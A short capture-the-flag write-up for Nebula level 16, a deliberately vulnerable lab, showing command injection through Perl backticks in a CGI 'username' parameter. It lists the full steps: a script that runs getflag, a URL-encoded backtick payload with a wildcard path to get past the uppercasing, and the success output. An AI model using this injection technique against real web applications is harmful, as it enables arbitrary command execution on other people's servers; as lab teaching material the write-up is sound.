Command substitution

         Nebula 16 Agenda: “There is a perl script running on port 1616.”

Ок, what we’ve got from source? Essentially there’s a one useful query parameter - “username”, which one after processing(converting to uppercase & space stripping) is gets into the line with perl’s command substitution (which works the same way as in the system shell):

1 @output = `egrep "^$username" /home/flag16/userdb.txt 2>&1`;

So what we need to do, is to create executable script with a name in uppercase and pass the right path to the query param.

1 level16@nebula:/home/flag16$ cat > /tmp/X
2 !#/bin/sh
3 getflag >> /tmp/flag.txt
4 
5 level16@nebula:/home/flag16$ chmod +x /tmp/X
6 level16@nebula:/home/flag16$ wget -q http://0.0.0.0:1616/index.cgi?username=%60/*/X%60
7 level16@nebula:/home/flag16$ cat /tmp/flag.txt                                  
8 You have successfully executed getflag on a target account

“%60” - is encoded backquote symbol.

Resources:

• How to Use Wildcards
• What does ` (backquote/backtick) mean in bash?
• Command Substitution